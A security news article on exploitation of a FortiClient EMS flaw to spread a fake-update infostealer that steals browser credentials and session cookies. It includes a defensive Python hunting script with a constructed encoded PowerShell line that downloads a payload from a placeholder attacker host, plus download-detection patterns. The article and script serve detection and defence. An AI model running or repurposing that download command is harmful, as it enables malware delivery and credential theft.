Critical FortiClient EMS Vulnerability Abused to Spread EKZ Infostealer via Fake Update Campaigns

A critical security vulnerability in FortiClient Endpoint Management Server (EMS) is being actively exploited by threat actors to distribute a newly identified credential-stealing malware known as EKZ Infostealer. The attacks leverage trusted management infrastructure to silently deploy malicious payloads across enterprise endpoints, raising serious concerns for organizations using Fortinet’s endpoint management platform.

Security researchers report that the flaw, tracked as CVE-2026-35616, has already been patched, but exploitation continues in environments that have not yet applied the latest updates.

How Attackers Exploit the FortiClient EMS Flaw

Cybersecurity firm Arctic Wolf revealed that attackers are abusing a pre-authentication API access bypass in FortiClient EMS that can lead to privilege escalation. Once access is gained, attackers can manipulate endpoint management configurations without authentication.

This allows them to push malicious scripts and commands directly through the EMS console, effectively turning enterprise management infrastructure into a malware distribution system.

The attack chain typically involves:

  • Gaining unauthorized access through the EMS vulnerability
  • Modifying endpoint management and remote access policies
  • Inserting malicious scripts into trusted update channels
  • Executing payloads across all connected endpoints

Fake Fortinet Update Used to Deliver Infostealer

Once inside the system, attackers deploy malware disguised as legitimate Fortinet updates. The payload is delivered through PowerShell and executed silently on targeted endpoints.

A malicious executable named “FortiEndpoint_Patch.exe” is used as part of the campaign. It masquerades as an official security update while functioning as an information-stealing tool.

The malware is designed to harvest sensitive data, including:

  • Saved browser passwords
  • Session cookies
  • Autofill data such as credit card details, addresses, and phone numbers

Targeted browsers include both Chromium-based and Gecko-based applications.

Abuse of Legitimate FortiClient Components

Researchers found that attackers also abuse legitimate FortiClient components, including fortitray.exe, to execute malicious scripts. This trusted binary is used to launch a .cmd file, which then triggers a Base64-encoded PowerShell command.

The PowerShell script performs several actions:

  1. Downloads the malicious payload
  2. Executes the credential-stealing malware
  3. Exfiltrates stolen data to a remote server via HTTP POST requests

The data is transmitted to an attacker-controlled IP address, while logs are stored locally in system directories before being sent out.

Configuration Tampering Expands Attack Scope

Beyond malware deployment, attackers also modify EMS configurations to maintain persistence and expand their control over enterprise environments. Observed changes include:

  • Disabling or delaying firmware update notifications
  • Altering remote access profiles
  • Injecting malicious scripts into endpoint policies

These changes allow attackers to silently distribute malware across all managed systems without requiring individual compromise of each device.

Security analysts warn that once EMS is compromised, every connected endpoint becomes vulnerable to secondary attacks.

Data Theft and Credential Risks

The EKZ Infostealer focuses heavily on credential theft and sensitive user data extraction. Once installed, it collects and stores harvested information locally before exfiltration.

Stolen data may enable attackers to:

  • Access corporate cloud services
  • Compromise internal business applications
  • Bypass multi-factor authentication through session cookie reuse
  • Move laterally across enterprise networks

Security experts emphasize that session hijacking techniques significantly increase the risk of persistent unauthorized access.

Broader Impact and Attack Strategy

The attack demonstrates a growing trend in which threat actors target endpoint management platforms rather than individual devices. By compromising centralized administration tools, attackers can scale malware deployment across entire organizations.

Arctic Wolf notes that the observed campaign uses trusted management pathways to blend malicious activity with legitimate administrative operations, making detection significantly more difficult.

Mitigation and Security Recommendations

Fortinet has addressed the vulnerability in FortiClient EMS version 7.4.7 and later, and organizations are strongly advised to update immediately.

Security experts recommend the following protective measures:

  • Upgrade FortiClient EMS to the latest patched version
  • Restrict administrative access to EMS consoles
  • Monitor for unauthorized configuration changes
  • Audit endpoint policy modifications and script deployments
  • Block suspicious PowerShell activity tied to EMS processes

Organizations are also urged to review logs for unusual update behavior or unexpected endpoint script execution.
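As an added example (not code from the article or from Arctic Wolf), the following Python script shows how a defender could hunt process-creation telemetry for the chain described above: fortitray.exe launching a .cmd that spawns Base64-encoded PowerShell which downloads a payload. The Sysmon-style events, the placeholder host and the decoded download command are all constructed for this example; the event field names are an assumption about the log format.

```python
import base64
import re

# Constructed Sysmon-style process-creation events, not telemetry from the report; pids 100-300
# model the chain described above (fortitray.exe -> .cmd -> encoded PowerShell), 400-500 are benign.
ENCODED_CMD = base64.b64encode(
    "Invoke-WebRequest 'http://ATTACKER-IP-PLACEHOLDER/FortiEndpoint_Patch.exe' -OutFile $env:TEMP\\p.exe"
    .encode("utf-16-le")).decode()
BENIGN_CMD = base64.b64encode("Get-Service FortiClient".encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe", "cmdline": "FortiTray.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": r'cmd.exe /c "C:\Users\Public\update.cmd"'},
    {"pid": 300, "ppid": 200, "image": PS, "cmdline": f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED_CMD}"},
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 500, "ppid": 400, "image": PS, "cmdline": f"powershell.exe -EncodedCommand {BENIGN_CMD}"},
]
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "net.webclient", "http://", "https://")

def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand/-enc argument (Base64 of UTF-16LE), or None."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not valid Base64, or not a UTF-16LE string
        return None

def ancestors(event, by_pid):
    """Yield lower-cased basenames of parent, grandparent, ... until the chain leaves the log."""
    seen, ppid = set(), event["ppid"]
    while ppid in by_pid and ppid not in seen:  # seen-set guards against pid-reuse loops
        seen.add(ppid)
        yield by_pid[ppid]["image"].rsplit("\\", 1)[-1].lower()
        ppid = by_pid[ppid]["ppid"]

def find_suspicious_chains(events):
    """Flag PowerShell descended from fortitray.exe whose (decoded) command reaches out to the network."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if not e["image"].lower().endswith("powershell.exe"):
            continue
        lineage = list(ancestors(e, by_pid))
        script = decode_encoded_command(e["cmdline"]) or e["cmdline"]
        if "fortitray.exe" in lineage and any(mk in script.lower() for mk in DOWNLOAD_MARKERS):
            findings.append({"pid": e["pid"], "lineage": lineage, "decoded": script})
    return findings
```

Run against real Sysmon or EDR exports by mapping their process id, parent id, image and command-line fields onto the dict keys used here; a hit is a lead to triage, not proof of compromise on its own.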

Conclusion

The exploitation of FortiClient EMS highlights how attackers increasingly weaponize trusted enterprise management systems to distribute malware at scale. By combining privilege escalation flaws with legitimate administrative tools, threat actors are able to bypass traditional defenses and deploy credential-stealing payloads across entire networks.

As exploitation continues in unpatched environments, rapid patch adoption and strict EMS access controls remain critical to preventing widespread compromise.

Copyright © 2023 Cyber Reports Cyber Security News All Rights Reserved Website by Top Search SEO